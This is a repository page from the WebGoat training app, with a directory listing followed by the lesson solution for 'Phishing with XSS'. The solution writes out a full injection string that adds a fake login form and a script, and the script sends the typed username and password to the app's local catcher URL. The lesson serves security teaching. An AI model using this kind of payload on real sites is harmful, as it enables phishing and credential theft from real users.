doc
java
newDesign
resources
scripts
tomcatconf
webapp
META-INF
WEB-INF
css
database
fonts
images
js
lesson_plans
lesson_solutions
AccessControlMatrix_files
BackDoors_files
BasicAuthentication_files
BlindSqlInjection_files
BypassHtmlFieldRestrictions_files
CSRF_files
ClientSideFiltering_files
ClientSideValidation_files
CommandInjection_files
ConcurrencyCart_files
CsrfPromptByPass_files
CsrfTokenByPass_files
DOMInjection_files
DOMXSS_files
DOS_Login_files
FailOpenAuthentication_files
ForcedBrowsing_files
ForgotPassword_files
HiddenFieldTampering_files
HtmlClues_files
HttpBasics_files
HttpOnly_files
HttpSplitting_files
InsecureLogin_files
JSONInjection_files
JavaScriptValidation_files
Lab Access Control
Lab SQL Injection
Lab XSS
LogSpoofing_files
MaliciousFileExecution_files
MultiLevelLogin1_files
MultiLevelLogin2_files
PasswordStrength_files
PathBasedAccessControl_files
Phishing_files
ReflectedXSS_files
RemoteAdminFlaw_files
SessionFixation_files
SilentTransactions_files
SoapRequest_files
SqlAddData_files
SqlModifyData_files
SqlNumericInjection_files
SqlStringInjection_files
StoredXSS_files
ThreadSafetyProblem_files
TraceXSS_files
UncheckedEmail_files
WSDLScanning_files
WeakAuthenticationCookie_files
WeakSessionID_files
WeakSessionID_filesBAK
WsSAXInjection_files
WsSqlInjection_files
XMLInjection_files
XPATHInjection_files
AccessControlMatrix.html
BackDoors.html
BasicAuthentication.html
BlindNumericSqlInjection.html
BlindStringSqlInjection.html
BypassHtmlFieldRestrictions.html
CSRF.html
ClientSideFiltering.html
ClientSideValidation.html
CommandInjection.html
ConcurrencyCart.html
CsrfPromptByPass.html
CsrfTokenByPass.html
DOMInjection.html
DOMXSS.html
DOS_Login.html
DangerousEval.html
Encoding.html
FailOpenAuthentication.html
ForcedBrowsing.html
ForgotPassword.html
HiddenFieldTampering.html
HtmlClues.html
HttpBasics.html
HttpOnly.html
HttpSplitting.html
InsecureLogin.html
JSONInjection.html
JavaScriptValidation.html
LogSpoofing.html
MaliciousFileExecution.html
MultiLevelLogin1.html
MultiLevelLogin2.html
OffByOne.html
PasswordStrength.html
PathBasedAccessControl.html
Phishing.html
ReflectedXSS.html
RemoteAdminFlaw.html
SameOriginPolicyProtection.html
SessionFixation.html
SilentTransactions.html
SoapRequest.html
SqlAddData.html
SqlModifyData.html
SqlNumericInjection.html
SqlStringInjection.html
StoredXss.html
ThreadSafetyProblem.html
TraceXSS.html
UncheckedEmail.html
WSDLScanning.html
WeakAuthenticationCookie.html
WeakSessionID.html
WeakSessionID.htmlBAK
WsSAXInjection.html
WsSqlInjection.html
XMLInjection.html
XPATHInjection.html
formate.css
lessons
plugins
users
lesson_content.jsp
main.jsp
reportBug.jsp
sideWindow.jsp
webgoat.jsp
webgoat_challenge.jsp
.gitignore
README.txt
build.xml
pom.xml
webgoat for SQL Server.bat
webgoat.bat
webgoat.sh
webgoat_8080.bat
webscarab.bat
git-svn-id: http://webgoat.googlecode.com/svn/branches/webgoat-6.0@485 4033779f-a91e-0410-96ef-6bf7bf53c507
70 lines
4.1 KiB
HTML
70 lines
4.1 KiB
HTML
<html>
|
|
<head>
|
|
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
|
|
<title>Phising with XSS</title>
|
|
<link rel="stylesheet" type="text/css" href="lesson_solutions/formate.css">
|
|
</head>
|
|
<body>
|
|
<p><b>Lesson Plan Title:</b> Phishing with XSS</p>
|
|
|
|
<p><b>Concept / Topic To Teach:</b><br/>
|
|
It is always a good practice to validate all input on the
|
|
server side. XSS can occur when unvalidated user input is used
|
|
in an HTTP response. With the help of XSS you can do a Phishing
|
|
Attack and add content to a page which looks official. It is very
|
|
hard for a victim to determinate that the content is malicious.
|
|
</p>
|
|
|
|
<p><b>General Goal(s):</b><br/>
|
|
The user should be able to add a form asking for username
|
|
and password. On submit the input should be sent to
|
|
http://localhost/WebGoat/catcher?PROPERTY=yes&user=catchedUserName&password=catchedPasswordName
|
|
</p>
|
|
|
|
<b>Solution:</b><br/>
|
|
With XSS it is possible to add further elements to an existing Page.
|
|
This solution consists of two parts you have to combine:
|
|
<ul>
|
|
<li>A form the victim has to fill in</li>
|
|
<li>A script which reads the form and sends the gathered information to the attacker</li>
|
|
</ul>
|
|
A Form with username and password could look like this:<br/>
|
|
<p>
|
|
</form><form name="phish"><br><br><HR><H3>This feature requires account login:</H3
|
|
><br><br>Enter Username:<br><input type="text" name="user"><br>Enter Password:<br><input type="password"
|
|
name = "pass"><br></form><br><br><HR>
|
|
<br/><br/>Search for this term and you will see that a form is added to the page since the search field accepts HTML.
|
|
<br/>The initial </form> tag is to terminate the original search form.
|
|
</p>
|
|
Now you need a script:
|
|
<p>
|
|
<script>function hack(){ XSSImage=new Image; XSSImage.src="<font color="blue">http://localhost/WebGoat/</font>catcher?PROPERTY=yes&user="+
|
|
document.phish.user.value + "&password=" + document.phish.pass.value + ""; alert("Had this been a real attack... Your credentials were just stolen.
|
|
User Name = " + document.phish.user.value + "Password = " + document.phish.pass.value);}
|
|
</script>
|
|
</p>
|
|
<p>
|
|
This script will read the input from the form and send it to the catcher of WebGoat.<br/>
|
|
The text <font color="blue">in blue</font> should match what is in your address bar. If you are using ports and/or webscarab, it may be different.<br/>
|
|
The last step is to put things together. Add a Button to the form which
|
|
calls the script. You can reach this with the onclick="myFunction()" handler:
|
|
</p>
|
|
<p>
|
|
<input type="submit" name="login" value="login" onclick="hack()">
|
|
<p>
|
|
The final String looks like this:<br/>
|
|
</form><script>function hack(){ XSSImage=new Image; XSSImage.src="<font color="blue">http://localhost/WebGoat/</font>catcher?PROPERTY=yes&user="+
|
|
document.phish.user.value + "&password=" + document.phish.pass.value + ""; alert("Had this been a real attack... Your credentials were just stolen.
|
|
User Name = " + document.phish.user.value + "Password = " + document.phish.pass.value);}
|
|
</script><form name="phish"><br><br><HR><H3>This feature requires account login:</H3
|
|
><br><br>Enter Username:<br><input type="text" name="user"><br>Enter Password:<br><input type="password"
|
|
name = "pass"><br><input type="submit" name="login" value="login" onclick="hack()"></form><br><br><HR>
|
|
</p>
|
|
Search for this String and you will see a form asking for your username and password.
|
|
Fill in these fields and click on the Login Button, which completes the lesson.<br/><br/>
|
|
<img src="lesson_solutions/Phishing_files/image001.jpg"><br/>
|
|
<font size="2"><b>New login field after submitting the script.</b></font><br/><br/><br/>
|
|
</body>
|
|
</html>
|
|
|